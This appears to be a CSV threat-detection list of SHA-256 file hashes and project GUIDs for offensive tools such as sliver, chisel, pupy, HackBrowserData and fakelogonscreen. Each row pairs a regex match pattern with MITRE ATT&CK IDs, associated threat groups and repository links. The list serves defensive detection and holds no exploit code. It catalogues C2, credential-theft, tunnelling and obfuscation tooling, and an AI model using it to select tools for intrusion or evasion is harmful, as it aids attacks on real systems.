"*34fd5e0317fa3aa3439dd42857c889f12bda61055404058c08d8f40a3520d201*",".{0,1000}34fd5e0317fa3aa3439dd42857c889f12bda61055404058c08d8f40a3520d201.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","24513"
"*350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5*",".{0,1000}350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24514"
"*3504F678-95FA-4DB2-8437-31A927CABC16*",".{0,1000}3504F678\-95FA\-4DB2\-8437\-31A927CABC16.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","24515"
"*350cfd6e53c72d9c3d2fa109cc73e69171d8f1bed85ced979483592908925aff*",".{0,1000}350cfd6e53c72d9c3d2fa109cc73e69171d8f1bed85ced979483592908925aff.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#filehash","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","24516"
"*350ddee8077a8a8df47d7a57b8d25afaa7915b4a7b79bcd683684723d0f8b669*",".{0,1000}350ddee8077a8a8df47d7a57b8d25afaa7915b4a7b79bcd683684723d0f8b669.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24517"
"*351268e508cccd1a0bf2c53e605a5db1df85b8c5d4095a4ef0e2d9bb997b39a2*",".{0,1000}351268e508cccd1a0bf2c53e605a5db1df85b8c5d4095a4ef0e2d9bb997b39a2.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24518"
"*35151960809a922f735b9492d55792b5cbcef5f3f47060ef484f92f63fe751a9*",".{0,1000}35151960809a922f735b9492d55792b5cbcef5f3f47060ef484f92f63fe751a9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24519"
"*351b7ea09ad99959f21e0c21bef93112ec360ccef4bc0cbaaed390a16631326b*",".{0,1000}351b7ea09ad99959f21e0c21bef93112ec360ccef4bc0cbaaed390a16631326b.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","#filehash","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","24521"
"*352cbeb2cb8456e9462f30ce30e2110101446efda08aa6f36e150680908b638c*",".{0,1000}352cbeb2cb8456e9462f30ce30e2110101446efda08aa6f36e150680908b638c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24523"
"*3532e7da204a5242b3ee2a3081cc68f7cd3728d45bbcbc582c077472bba4a7f5*",".{0,1000}3532e7da204a5242b3ee2a3081cc68f7cd3728d45bbcbc582c077472bba4a7f5.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","24524"
"*353f18e314f024ceea013bd97c140e09fd4ac715bf9ac7c965d0b89845dffcf0*",".{0,1000}353f18e314f024ceea013bd97c140e09fd4ac715bf9ac7c965d0b89845dffcf0.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","#filehash","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","24528"
"*3544c0f867cd0e4fa8acf93997a3facb93662bf9b3770959b953aeb2f81adaa3*",".{0,1000}3544c0f867cd0e4fa8acf93997a3facb93662bf9b3770959b953aeb2f81adaa3.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","24529"
"*354a7236afe220e7c831129fbf32434edd1d18961118dfb05279ff5c1b6f38ad*",".{0,1000}354a7236afe220e7c831129fbf32434edd1d18961118dfb05279ff5c1b6f38ad.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","#filehash","N/A","9","2","132","17","2024-05-08T19:40:13Z","2024-03-11T22:24:56Z","24530"
"*354f17db4f3eeff8cbfd56f6aabea68deb7045572ba55298bbfb1e355c98a246*",".{0,1000}354f17db4f3eeff8cbfd56f6aabea68deb7045572ba55298bbfb1e355c98a246.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24531"
"*354f944df24458e6113663bf2886bcd902304e0c2852b4447bb386361ca3ef86*",".{0,1000}354f944df24458e6113663bf2886bcd902304e0c2852b4447bb386361ca3ef86.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","24532"
"*355a9a09cf1e95bf38e89df4c267121c3592c873de0ee9912afaf2cc840e77ca*",".{0,1000}355a9a09cf1e95bf38e89df4c267121c3592c873de0ee9912afaf2cc840e77ca.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24533"
"*355c68b197356e23687866e8ea8068ac29b62e3bb4657b9180729eebce44d7a9*",".{0,1000}355c68b197356e23687866e8ea8068ac29b62e3bb4657b9180729eebce44d7a9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24534"
"*3560411a4c3ed8e9229e7684be1c002f39cdaa5482c6d5046984d4be7985a594*",".{0,1000}3560411a4c3ed8e9229e7684be1c002f39cdaa5482c6d5046984d4be7985a594.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","24535"
"*35678541d1d3a394875f58f3add9b097f445dc15de0a720318da1db4d1de06e8*",".{0,1000}35678541d1d3a394875f58f3add9b097f445dc15de0a720318da1db4d1de06e8.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","24536"
"*356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae*",".{0,1000}356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24537"
"*356ce77ad527c67a64f6f770d67ef71a6d4ebecfd362d651cbf08c98e7f21555*",".{0,1000}356ce77ad527c67a64f6f770d67ef71a6d4ebecfd362d651cbf08c98e7f21555.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","24538"
"*356d85b11449179fcb887ad4ce0356a23b8ef5a80318c4318c37d31f53affee8*",".{0,1000}356d85b11449179fcb887ad4ce0356a23b8ef5a80318c4318c37d31f53affee8.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","24540"
"*356fc0b7eacb629e745a774a22e5ed1f82aea70dc9bc420a1d71b9d28ef27830*",".{0,1000}356fc0b7eacb629e745a774a22e5ed1f82aea70dc9bc420a1d71b9d28ef27830.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24543"
"*357b50be2506c10d74d5792d52cfd892155540741f3dbf270eefcffe6884fd14*",".{0,1000}357b50be2506c10d74d5792d52cfd892155540741f3dbf270eefcffe6884fd14.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","24547"
"*358282c9584c5b32ce5aa55238c71fc7d4cb405e5b7f0ef5e2db4950a4a34b4f*",".{0,1000}358282c9584c5b32ce5aa55238c71fc7d4cb405e5b7f0ef5e2db4950a4a34b4f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","24548"
"*35849ba82ab0c1fb2c295f53326954434d2612aa31dab3c1ea7703690477ab0d*",".{0,1000}35849ba82ab0c1fb2c295f53326954434d2612aa31dab3c1ea7703690477ab0d.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","24549"
"*358f4605b34480a8bc335e7ba588171d12a7c14c7219b2438c3594392b7c0468*",".{0,1000}358f4605b34480a8bc335e7ba588171d12a7c14c7219b2438c3594392b7c0468.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","24550"
"*35962679b2963d0c6af600db73685b744495e6a65a24c3c9809e8ab2ef52225a*",".{0,1000}35962679b2963d0c6af600db73685b744495e6a65a24c3c9809e8ab2ef52225a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","24551"
"*35a1cbb81eb45e28f4e9cbecf0cc3d9d4bf1fe27413ae605bf6df9c226348768*",".{0,1000}35a1cbb81eb45e28f4e9cbecf0cc3d9d4bf1fe27413ae605bf6df9c226348768.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","24553"
"*35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7*",".{0,1000}35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","24554"
"*35a53f161401fc9f654cb82ed45244023ccd22315a638e8ec2b37b6ec814de80*",".{0,1000}35a53f161401fc9f654cb82ed45244023ccd22315a638e8ec2b37b6ec814de80.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","24555"
"*35aa30b42ea12208cfad81a29831d88d0a778ab192186c516d89e1c9f538a285*",".{0,1000}35aa30b42ea12208cfad81a29831d88d0a778ab192186c516d89e1c9f538a285.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","24557"
"*35c64b018248a12e677777eab956c086212a2fe5d7206e76d66ac5dc9fa41103*",".{0,1000}35c64b018248a12e677777eab956c086212a2fe5d7206e76d66ac5dc9fa41103.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","24559"
"*35c8d88f94fff53d9dd573801f16aa02e24f771668747e3f0d2975ff4d0b85b8*",".{0,1000}35c8d88f94fff53d9dd573801f16aa02e24f771668747e3f0d2975ff4d0b85b8.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","24560"
"*35c8e39ebbd238ce994c3bb0cb274e37f2b5e94af2488e6009ecc872d465340b*",".{0,1000}35c8e39ebbd238ce994c3bb0cb274e37f2b5e94af2488e6009ecc872d465340b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","24561"
"*35cc4208d80e7a202cef1cf17f6a2d1a629400410eaccecdb70c3c85f79ec431*",".{0,1000}35cc4208d80e7a202cef1cf17f6a2d1a629400410eaccecdb70c3c85f79ec431.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","24562"
"*35d295a5f04094a88ddf9c0704c8555bcaf980d9eb15505549f2ace647324cd6*",".{0,1000}35d295a5f04094a88ddf9c0704c8555bcaf980d9eb15505549f2ace647324cd6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24563"
"*35d2dc2cf8f535667b487b012b1d0efad5ceca399967923a580f1929f5717c52*",".{0,1000}35d2dc2cf8f535667b487b012b1d0efad5ceca399967923a580f1929f5717c52.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","24564"
"*35d3030e079a68ce10e998b5140d66fbb54b4a6e7f8ed090bf918abc42175dce*",".{0,1000}35d3030e079a68ce10e998b5140d66fbb54b4a6e7f8ed090bf918abc42175dce.{0,1000}","offensive_tool_keyword","1.6-C2","Using the Counter Strike 1.6 RCON protocol as a C2 Channel","T1071 - T1095 - T1572","TA0011 - TA0010","N/A","N/A","C2","https://github.com/eversinc33/1.6-C2","1","0","#filehash","N/A","6","10","78","5","2025-02-19T15:34:37Z","2024-01-23T18:30:00Z","24565"
"*35d9023ac28fe49540ae16d224a8edc09c97a12edfea883e48de778730cc2d3a*",".{0,1000}35d9023ac28fe49540ae16d224a8edc09c97a12edfea883e48de778730cc2d3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","24567"
"*3606d9525c865d6167a94ed60c9175e90f516104cbfe435aa30a34d05745badc*",".{0,1000}3606d9525c865d6167a94ed60c9175e90f516104cbfe435aa30a34d05745badc.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24570"
"*3608033d0516c29f2465dde62421670ed21b6da4ce9c9803fb09c0debc7bc8f8*",".{0,1000}3608033d0516c29f2465dde62421670ed21b6da4ce9c9803fb09c0debc7bc8f8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","24571"
"*360cf81e70e3f8cbdbb442c972896794f49c72515b1bc1699b2d25c8a37e4bfd*",".{0,1000}360cf81e70e3f8cbdbb442c972896794f49c72515b1bc1699b2d25c8a37e4bfd.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","24572"
"*360F9CE5-D927-46B9-8416-4118D0B68360*",".{0,1000}360F9CE5\-D927\-46B9\-8416\-4118D0B68360.{0,1000}","offensive_tool_keyword","ScriptBlock-Smuggling","SCRIPTBLOCK SMUGGLING: SPOOFING POWERSHELL SECURITY LOGS AND BYPASSING AMSI WITHOUT REFLECTION OR PATCHING","T1059.001 - T1562.001 - T1112 - T1202 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/BC-SECURITY/ScriptBlock-Smuggling","1","0","#GUIDproject","N/A","8","1","89","13","2024-06-18T08:35:50Z","2024-06-12T21:44:47Z","24573"
"*3615ddbae2c65e978aa8006c26b5c4a66c2e9433a1460b17ef700a39a708e5c1*",".{0,1000}3615ddbae2c65e978aa8006c26b5c4a66c2e9433a1460b17ef700a39a708e5c1.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","24575"
"*3615ddbae2c65e978aa8006c26b5c4a66c2e9433a1460b17ef700a39a708e5c1*",".{0,1000}3615ddbae2c65e978aa8006c26b5c4a66c2e9433a1460b17ef700a39a708e5c1.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","24576"
"*361ec6983d4a8683b685dc4f9b7280e4faebf3a4006cc44c7aab3ea94fe9d2d4*",".{0,1000}361ec6983d4a8683b685dc4f9b7280e4faebf3a4006cc44c7aab3ea94fe9d2d4.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","24577"
"*3622f69f847b1fd331363a847f626b9931363c81946b6d6e7441dc0959b4d971*",".{0,1000}3622f69f847b1fd331363a847f626b9931363c81946b6d6e7441dc0959b4d971.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","24578"
